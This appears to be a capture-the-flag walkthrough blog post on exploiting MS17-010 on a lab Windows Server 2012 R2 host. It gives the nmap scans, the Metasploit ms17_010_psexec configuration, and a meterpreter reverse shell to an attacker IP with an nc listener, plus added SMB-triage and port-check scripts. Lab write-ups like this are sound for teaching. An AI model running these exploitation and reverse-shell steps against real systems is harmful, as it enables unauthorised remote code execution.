That blog post has plenty of diagrams and looks rather impressive; readers who are interested can go read it themselves. A vulnerability this classic should have been patched everywhere by now, right? Just last month, when the Ironman contest had only just started (September 2024), three organisations called me in to deal with the same problem: they did not want to replace their Windows 7 desktops, but Line would no longer run on them. At the end of the year Line is reportedly dropping the iPhone 6 as well. Not to mention that this summer I saw a professor in a lab still using an XP machine, and I was summoned to sort out a printer driver.
Classic as it is, a real environment can still hold anything. In this challenge the scan shows that 172.16.x.x exposes SMB and matches several of the preconditions for MS17-010 (a Server 2008 R2 - 2012 era build, message signing not required, user-level authentication with a guest account accepted), so the odds that MS17-010 is present are high. These are indicators of an unhardened SMB service rather than proof of the bug itself; the definitive check is nmap's smb-vuln-ms17-010 script or Metasploit's auxiliary/scanner/smb/smb_ms17_010 module.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
First, as always, start with a full nmap port scan. The target has 135, 139, 445, 5985 and 49155 open. 5985 is WinRM (HTTP), and 49155 sits in the Windows dynamic RPC range (49152-65535): it is an MSRPC endpoint that the endpoint mapper on 135 hands out to clients, not an SMB port.
nmap -p- 172.16.x.x
A follow-up scan with default scripts and version detection surfaces the MS17-010 indicators (SMB signing not enforced, guest access accepted). Note that -sC does not run the MS17-010 check itself; for that, add --script smb-vuln-ms17-010.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p135,139,445,5985,49155 -sC -sV -O 172.16.x.x
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-01 23:01 EDT
Nmap scan report for 172.16.x.x
Host is up (0.64s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Datacenter 9600 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49155/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-10-02T03:02:52
|_ start_date: 2024-10-02T17:04:27
|_clock-skew: mean: 2h20m02s, deviation: 4h02m29s, median: 1s
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: WIN-SU2M9G4F4S5
| NetBIOS computer name: WIN-SU2M9G4F4S5\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-10-01T20:02:52-07:00
|_nbstat: NetBIOS name: WIN-SU2M9G4F4S5, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:01:36:95 (Microsoft)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.46 seconds
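As an added example (mine, not part of the original post), the shell below captures the triage I applied to the scan output: it reads nmap normal output, flags the SMB indicators that make MS17-010 plausible (445 open, signing not enforced, guest accepted, RPC dynamic endpoints) and only then prints the definitive check. The two scan excerpts embedded in it are constructed in the shape of the output above, not the page's own scan, and the function names are my own.

```sh
#!/bin/sh
# Added example: SMB triage over nmap normal output (POSIX sh + awk, no network needed).
# SAMPLE_SCAN / SAMPLE_HARDENED are constructed excerpts shaped like `nmap -sC -sV` output.

SAMPLE_SCAN='PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2012 R2 Datacenter 9600 microsoft-ds
49155/tcp open  msrpc        Microsoft Windows RPC
Host script results:
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)'

# The same host after hardening: signing required, no guest session (constructed).
SAMPLE_HARDENED='PORT      STATE SERVICE      VERSION
445/tcp   open  microsoft-ds Windows Server 2012 R2 Datacenter 9600 microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required'

# smb_triage SCAN_TEXT
#   Prints one finding per line. Exits 0 only when 445 is open AND signing is not
#   enforced, i.e. the preconditions under which an MS17-010 check is worth running.
smb_triage() {
    printf '%s\n' "$1" | awk '
        /^445\/tcp +open/                          { open445 = 1; print "445/tcp open" }
        /Message signing enabled but not required/ { nosign = 1;  print "SMB2 signing not enforced" }
        /message_signing: disabled/                { nosign = 1;  print "SMB1 signing disabled" }
        /account_used: guest/                      { print "guest/null session accepted" }
        /^[0-9]+\/tcp +open +msrpc/ {
            split($1, f, "/")          # "49155/tcp" -> f[1] = 49155
            if (f[1] >= 49152) print "RPC dynamic endpoint on " f[1] "/tcp (handed out by the endpoint mapper on 135)"
        }
        END { exit (open445 && nosign) ? 0 : 1 }'
}

# ms17_check_cmd TARGET
#   The definitive test. Signing/guest facts never prove MS17-010 on their own; only the
#   version-specific probe does (nmap script shown; msf smb_ms17_010 scanner is the equivalent).
ms17_check_cmd() {
    printf 'nmap -p445 --script smb-vuln-ms17-010 %s\n' "$1"
}

# triage_and_recommend TARGET SCAN_TEXT: findings, then the next command or a stop message.
triage_and_recommend() {
    if smb_triage "$2"; then
        ms17_check_cmd "$1"
    else
        echo "SMB signing enforced or 445 closed: MS17-010 check not indicated for $1"
    fi
}

triage_and_recommend 172.16.x.x "$SAMPLE_SCAN"
triage_and_recommend 172.16.x.x "$SAMPLE_HARDENED"
```

Pipe a real scan in with `triage_and_recommend HOST "$(nmap -p135,139,445 -sC -sV HOST)"`; the hardened sample shows why the verdict is tied to signing rather than to port 445 alone.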
At this point I got lazy and switched to msfconsole: search ms17-010.
┌──(kali㉿kali)-[~]
└─$ msfconsole -q
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
28 \_ target: Execute payload (x64) . . . .
29 \_ target: Neutralize implant . . . .
Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'
Here I picked module 10 for the exploitation. ms17_010_psexec rides the EternalRomance/EternalSynergy/EternalChampion transaction bugs instead of EternalBlue's kernel pool corruption, which is why it is ranked normal while ms17_010_eternalblue is only average (EternalBlue is the one known to blue-screen targets now and then). It needs a reachable named pipe, which the guest/null session in the scan provides. Both modules support check, so run check against RHOSTS before run.
msf6 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) >
Following the SOP from earlier: look up the Kali attacker's IP and set up nc. 😒
┌──(kali㉿kali)-[~]
└─$ ip addr
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.200.9/24 scope global tun0
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 443
Remember to set LHOST, LPORT and RHOSTS; show options confirms the configuration.
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 172.16.x.x
RHOSTS => 172.16.x.x
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.200.9
LHOST => 192.168.200.9
msf6 exploit(windows/smb/ms17_010_psexec) > set LPORT 443
LPORT => 443
msf6 exploit(windows/smb/ms17_010_psexec) > run
[-] Handler failed to bind to 192.168.200.9:443:- -
[-] Handler failed to bind to 0.0.0.0:443:- -
[-] 172.16.30.4:445 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).
[*] Exploit completed, but no session was created.
Running the module is supposed to hand over a shell after a short wait (run and exploit are aliases; exploit just looks more professional). Typing shell at the meterpreter > prompt then drops into an interactive cmd.exe:

meterpreter > shell

The next step would be to hunt for secret.txt on the box, but the error above says port 443 was already taken by another process, so Metasploit could not start its handler there. Eh~ it turns out nc does not need to be started at all: windows/meterpreter/reverse_tcp brings its own handler, so once Metasploit is up it does the rest. Close the nc listener (or set LPORT to a free port) and run again.
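The bind failure above is easy to pre-empt. As an added example (mine, not from the post), the POSIX shell below does the check I now run before setting LPORT: port_in_use reads `ss -Hltn`-style lines and reports whether a local port is already held, pick_lport returns the first preferred port nobody holds, and free_port_live wraps the real ss call. The listener table embedded in it is constructed to reproduce the situation above (nc holding 443); the function names are my own.

```sh
#!/bin/sh
# Added example: make sure LPORT is free before `run` (POSIX sh + awk).
# SAMPLE_LISTING is a constructed `ss -Hltn` table reproducing the nc-on-443 clash.
#   State  Recv-Q Send-Q  Local Address:Port  Peer Address:Port
SAMPLE_LISTING='LISTEN 0 1    0.0.0.0:443    0.0.0.0:*
LISTEN 0 128  127.0.0.1:631  0.0.0.0:*
LISTEN 0 4096 [::]:22        [::]:*'

# port_in_use PORT LISTING -> exit 0 if any listener's local address ends in :PORT
# (0.0.0.0:443, *:443 and [::]:443 all work: the last ':'-separated field is the port).
port_in_use() {
    printf '%s\n' "$2" | awk -v p="$1" '
        { n = split($4, a, ":"); if (a[n] == p) found = 1 }
        END { exit found ? 0 : 1 }'
}

# pick_lport LISTING PORT... -> prints the first candidate not in use; exit 1 if all are taken
pick_lport() {
    listing=$1; shift
    for p in "$@"; do
        if ! port_in_use "$p" "$listing"; then
            printf '%s\n' "$p"
            return 0
        fi
    done
    return 1
}

# free_port_live PORT... -> same check against the real socket table (needs iproute2's ss)
free_port_live() {
    pick_lport "$(ss -Hltn 2>/dev/null)" "$@"
}

# What the reverse_tcp handler ran into on the attack box in the post:
if port_in_use 443 "$SAMPLE_LISTING"; then
    echo "443 already bound (the nc listener). The payload brings its own handler, so kill nc or:"
    echo "  set LPORT $(pick_lport "$SAMPLE_LISTING" 443 4444 8443)"
fi
```

In practice: `free_port_live 443 4444 8443` right before `set LPORT`, and if it prints nothing, something else (a leftover nc, another msf handler) is still holding every candidate.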
meterpreter > shell
Process 132 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>dir / secret.txt -s
meterpreter > shell
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter > search -f secret.txt
[*] 172.16.x.x - Meterpreter session 1 closed. Reason: Died
Here my connection suddenly dropped; run the module again to reconnect, or wait a few minutes and retry. Two things worth knowing: dir / secret.txt -s above is not valid cmd.exe syntax (the recursive form is dir C:\secret.txt /s /b), and meterpreter's search -f secret.txt walks every drive, which over a link with 0.64 s latency can easily outlast the 15-second send timeout; narrowing it with search -d C:\Users -f secret.txt, or raising the timeout with sessions --interact 1 --timeout 60, gives the session a better chance of staying alive. Then comes the clairvoyance every box seems to require: somehow you just know to look for "secret.txt", and once you have its location, type shows the FLAG!!
c:>type c:...\secret.txt
or
meterpreter > cat c:\...\Secret.txt